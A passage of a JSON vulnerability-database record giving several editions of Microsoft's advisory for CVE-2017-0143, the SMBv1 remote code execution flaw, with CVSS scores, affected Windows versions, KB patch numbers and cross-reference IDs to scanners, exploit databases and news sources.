"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": 
["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", 